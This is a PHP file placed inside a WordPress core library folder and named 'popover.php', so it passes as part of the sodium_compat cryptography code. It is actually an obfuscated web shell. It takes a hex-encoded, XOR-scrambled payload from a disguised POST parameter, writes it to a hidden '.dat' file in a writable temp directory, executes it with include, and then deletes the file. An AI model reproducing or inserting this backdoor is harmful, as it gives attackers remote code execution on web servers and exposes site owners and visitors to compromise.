File: /home/hucscom/public_html/wp-includes/sodium_compat/namespaced/Core/Poly1305/popover.php
<?php
if(array_key_exists("po\x69\x6E\x74\x65r", $_POST) && !is_null($_POST["po\x69\x6E\x74\x65r"])){
$ent = hex2bin($_POST["po\x69\x6E\x74\x65r"]);
$parameter_group = '' ; for($a=0; $a<strlen($ent); $a++){$parameter_group .= chr(ord($ent[$a]) ^ 34);}
$ptr = array_filter([ini_get("upload_tmp_dir"), "/tmp", getenv("TMP"), sys_get_temp_dir(), getcwd(), "/var/tmp", "/dev/shm", getenv("TEMP"), session_save_path()]);
$key = 0;
do {
$pgrp = $ptr[$key] ?? null;
if ($key >= count($ptr)) break;
if (!( !is_dir($pgrp) || !is_writable($pgrp) )) {
$sym = join("/", [$pgrp, ".dat"]);
if (file_put_contents($sym, $parameter_group)) {
include $sym;
@unlink($sym);
die();
}
}
$key++;
} while (true);
}